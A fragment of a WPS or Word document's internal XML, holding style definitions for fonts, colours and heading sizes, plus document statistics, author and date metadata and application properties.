      </w14:textFill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="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill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ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill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ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill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  <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:r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qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr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  <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="24">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:r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uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="32">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="4"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="33">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="5"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="tx1"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="34">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="6"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="仿宋" w:cstheme="majorBidi"/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35">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="19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2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="45">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="12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21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21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000000" w:themeColor="text1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716</Words>
  <Characters>1788</Characters>
  <Lines>12</Lines>
  <Paragraphs>8</Paragraphs>
  <TotalTime>2</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2077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2026-03-30T06:11:00Z</dcterms:created>
  <dc:creator>Anonymous、DAK</dc:creator>
  <cp:lastModifiedBy>Anonymous、DAK</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-30T09:44:24Z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eyJoZGlkIjoiYTZkZTg3MWY1ZTRhY2E3YTc1YTJkZWMyMzE5YWE0NDEiLCJ1c2VySWQiOiIyNDMyMzEwODAifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.25225</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>317210D13FBF4A0B961A3602547B7DE1_12</vt:lpwstr>
  </property>
</Properties>
</file>